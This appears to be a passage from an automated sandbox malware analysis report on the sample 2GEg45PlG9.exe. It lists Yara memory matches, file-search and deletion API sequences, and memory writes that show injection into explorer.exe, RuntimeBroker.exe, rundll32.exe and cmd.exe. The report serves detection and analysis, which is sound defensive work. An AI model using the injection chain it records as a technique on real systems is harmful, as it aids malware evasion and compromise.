Source: Yara match | File source: 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702063313.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702232762.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346992994.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346913060.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346959210.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702016813.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702206900.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.703676134.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.701957024.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.838458423.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347006812.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347017616.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702145483.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 2GEg45PlG9.exe PID: 6540, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4768, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6576, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6500, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a994a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.2GEg45PlG9.exe.20d0000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000023.00000000.640272876.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.665585940.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.607122164.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397282239.0000000002A99000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.517379497.0000000002720000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.645879141.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.651725640.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.465481306.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.566373017.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.469185979.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.547994492.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.560669492.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.585352410.000002E0BE597000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.516035040.0000000002559000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.613095849.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.663821435.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.546791184.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.618879777.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.555920972.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.544941434.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397218720.0000000002A1A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.661999238.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.466675811.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078E9AC lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079999E lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0091999E FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0090E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0091A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6FEAA12E0 |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Memory written: C:\Windows\System32\control.exe base: C60000 |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6FEAA12E0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 93E000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2AC0000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 93C000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 2D60000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7425E5FD0 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 23D834B0000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7425E5FD0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057C000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E2C000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5200000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290AE000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: D2F18CF000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27740170000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 89B4D22000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 1F0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0 |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read |
Source: control.exe, 00000015.00000000.465834683.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.463412327.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.469746208.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.467731710.00000192823C0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.479425710.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506871853.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.481209654.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506458599.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.559720745.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.554305571.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.542290609.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.531101419.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.537380226.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000002.839664387.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.547364996.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.565113464.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.617259125.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.605838216.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.586548469.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.593422268.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.600027354.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.611451927.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579445287.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.840115033.00000163C2A60000.00000002.00020000.sdmp | Binary or memory string: Program Manager |
Source: explorer.exe, 00000018.00000000.505405449.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.478935674.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.480786965.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr |
